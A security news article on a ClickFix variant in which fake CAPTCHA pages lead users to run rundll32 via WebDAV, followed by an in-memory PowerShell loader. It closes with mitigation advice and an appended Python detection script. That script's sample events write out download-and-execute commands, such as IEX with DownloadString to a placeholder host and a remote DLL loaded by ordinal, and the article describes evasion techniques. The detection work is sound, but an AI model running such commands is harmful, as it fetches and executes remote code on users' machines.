A sophisticated new variant of the ClickFix attack is actively targeting Windows users, employing a novel combination of rundll32.exe and WebDAV to bypass prevalent PowerShell detection methods. This evolving threat landscape demands increased vigilance as attackers leverage built-in Windows functionalities to execute malicious payloads with reduced visibility.
The ClickFix technique, known for its deceptive social engineering, prompts users to manually execute commands that ultimately lead to system compromise. This latest iteration sharpens that approach by sidestepping script-based detection mechanisms, making it a significant concern for organizations relying solely on traditional security measures.
New ClickFix Variant Uses Rundll32 and WebDAV for Evasion
CyberProof analysts have identified a more advanced ClickFix attack variant that notably delegates the initial execution of malicious commands to rundll32.exe, paired with the WebDAV protocol. This departure from previous versions, which often relied on PowerShell or mshta, presents a significant challenge for security teams. WebDAV (Web Distributed Authoring and Versioning) is an extension of HTTP that, in this context, allows Windows to treat remote files as if they were local, facilitating the stealthy retrieval of malicious components.
The attack chain begins with a user being directed to a deceptive website, such as “healthybyhillary[.]com,” impersonating a CAPTCHA verification page. The site instructs the unwitting victim to press ‘Win + R’ to open the Windows Run dialog, paste a prepared command with ‘Ctrl + V,’ and then press ‘Enter.’ This carefully crafted social engineering tactic exploits user trust, leading victims to initiate the attack sequence themselves.
By utilizing rundll32.exe with WebDAV, the attack bypasses common security alerts that typically flag direct PowerShell script execution. The command often takes the form of running a DLL from a remote server. For instance, a command like rundll32.exe \[email protected],#1 would instruct rundll32.exe to load the specified DLL from a remote source. The use of ordinal numbers (like #1) instead of named export functions further obfuscates the malicious activity, adding another layer of complexity for analysis.
Detection Evasion Through Native Windows Components and In-Memory Execution
The true sophistication of this ClickFix variant lies in its multi-stage execution strategy that largely remains in memory, minimizing its digital footprint. After the initial rundll32.exe execution fetches and loads a remote DLL via WebDAV, the infection chain transitions to PowerShell. However, this PowerShell execution often occurs later in the sequence and is carefully engineered to avoid detection.
The PowerShell stage uses Invoke-Expression (IEX) together with Net.WebClient.DownloadString to fetch subsequent payloads and run them directly in memory, without writing them to disk. Non-interactive switches such as -NoP (NoProfile) and -NonI (NonInteractive) are passed so that the process starts without loading the user’s profile or presenting an interactive prompt, keeping the execution quiet.
The core payload, identified as a secondary loader named SkimokKeep, is delivered as a 32-bit Windows DLL disguised as ‘verification.google.’ This loader employs several advanced anti-analysis techniques. Instead of directly importing Windows API functions, it navigates the Process Environment Block (PEB) to dynamically locate loaded system modules and resolves function addresses by using a hashing algorithm similar to DJB2. This method hides the specific Windows APIs the malware relies on, significantly complicating static analysis efforts.
Furthermore, the payload incorporates robust checks to detect and evade sandboxed or virtualized environments. It utilizes functions such as GetSystemMetrics, GetForegroundWindow, and GetSystemTime to identify anomalies. Additionally, anti-debugging mechanisms, including timing checks using GetTickCount and process ID inspection, are in place to alter the malware’s behavior or halt execution if it suspects it is being monitored by security researchers or automated analysis tools.
In a further effort to maintain persistence and evade detection, rundll32.exe injects code into legitimate running processes, such as chrome.exe and msedge.exe, by altering their memory. This technique helps the malware stay hidden in plain sight within normal system operations.
To mitigate this threat, security teams are strongly advised to implement comprehensive command-line auditing for all executions of living-off-the-land binaries (LOLBins), particularly rundll32.exe, to identify unusual usage patterns. Monitoring for arguments associated with the Windows WebDAV client, such as davclnt.dll and DavSetCookie, can be a strong indicator of malicious activity. Restricting or closely monitoring outbound WebDAV traffic on port 80 is also recommended where it is not operationally required.
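The following is an added example, not code from the article or from CyberProof, showing how the command-line auditing recommended here can be turned into detection logic covering the rundll32.exe usage described earlier (remote DLL with an ordinal export, WebDAV client activity) and the quiet in-memory PowerShell stage. The process-creation events are constructed samples shaped like Sysmon Event ID 1 fields; the `\\host@80\` notation is the standard Windows WebDAV UNC form and the TEST-NET address is a placeholder.

```python
import re

# Constructed sample events (not from the article): (parent image, image, command line).
SAMPLE_EVENTS = [
    ("explorer.exe", "rundll32.exe",
     r"rundll32.exe \\198.51.100.7@80\share\verification.dll,#1"),
    ("svchost.exe", "rundll32.exe",
     r"rundll32.exe C:\Windows\System32\davclnt.dll,DavSetCookie "
     r"198.51.100.7@80 http://198.51.100.7/share"),
    ("rundll32.exe", "powershell.exe",
     "powershell.exe -NoP -NonI -W Hidden -c IEX "
     "(New-Object Net.WebClient).DownloadString('http://198.51.100.7/x')"),
    ("explorer.exe", "rundll32.exe",
     r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),   # benign
    ("explorer.exe", "powershell.exe",
     "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"),   # benign
]

WEBDAV_UNC = re.compile(r"\\\\[^\\\s]+@(80|443|SSL)\b", re.IGNORECASE)  # \\host@80\...
ORDINAL_EXPORT = re.compile(r"\.dll,#\d+", re.IGNORECASE)                # export by ordinal
DAV_CLIENT = re.compile(r"davclnt\.dll|DavSetCookie", re.IGNORECASE)     # WebClient service
PS_QUIET = re.compile(r"-NoP\b|-NonI\b|-W(indowStyle)?\s+Hidden", re.IGNORECASE)
PS_INMEM = re.compile(r"\bIEX\b|Invoke-Expression|DownloadString", re.IGNORECASE)

def classify(parent, image, cmdline):
    """Return the detection labels that fire for one process-creation event."""
    hits = []
    img = image.lower()
    if img == "rundll32.exe":
        if WEBDAV_UNC.search(cmdline):
            hits.append("rundll32_webdav_unc")
        if ORDINAL_EXPORT.search(cmdline):
            hits.append("rundll32_ordinal_export")
        if DAV_CLIENT.search(cmdline):
            hits.append("webdav_client_activity")
        # A command pasted into the Win+R Run dialog is launched by explorer.exe.
        if hits and parent.lower() == "explorer.exe":
            hits.append("launched_from_run_dialog")
    if img in ("powershell.exe", "pwsh.exe"):
        if PS_QUIET.search(cmdline) and PS_INMEM.search(cmdline):
            hits.append("ps_quiet_inmemory_download")
        if parent.lower() == "rundll32.exe":
            hits.append("ps_spawned_by_rundll32")
    return hits

def scan(events):
    """Map each suspicious command line to its labels; clean events are dropped."""
    results = {}
    for parent, image, cmdline in events:
        hits = classify(parent, image, cmdline)
        if hits:
            results[cmdline] = hits
    return results
```

Running `scan(SAMPLE_EVENTS)` flags the first three events and leaves the two benign ones (a named shell32 export and a profile-less script run) unflagged, because `-NoP\b` does not match `-NoProfile` and no in-memory download pattern is present.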
Blocking connections to known malicious IP addresses, including 178.16.53[.]137, 141.98.234[.]27, 46.149.73[.]60, and 91.219.23[.]245, as well as suspicious domains like mer-forgea.sightup[.]in[.]net and data-x7-sync.neurosync[.]in[.]net, is crucial. Improving user awareness training to specifically address fake CAPTCHA pages and ClickFix-style social engineering attacks is paramount, as the success of this campaign relies heavily on user interaction.
The ongoing evolution of such attack techniques highlights the need for layered security approaches that go beyond signature-based detection. Organizations should focus on behavioral analysis, endpoint detection and response (EDR) capabilities, and proactive threat hunting to stay ahead of emerging threats like this new rundll32.exe and WebDAV-based ClickFix variant.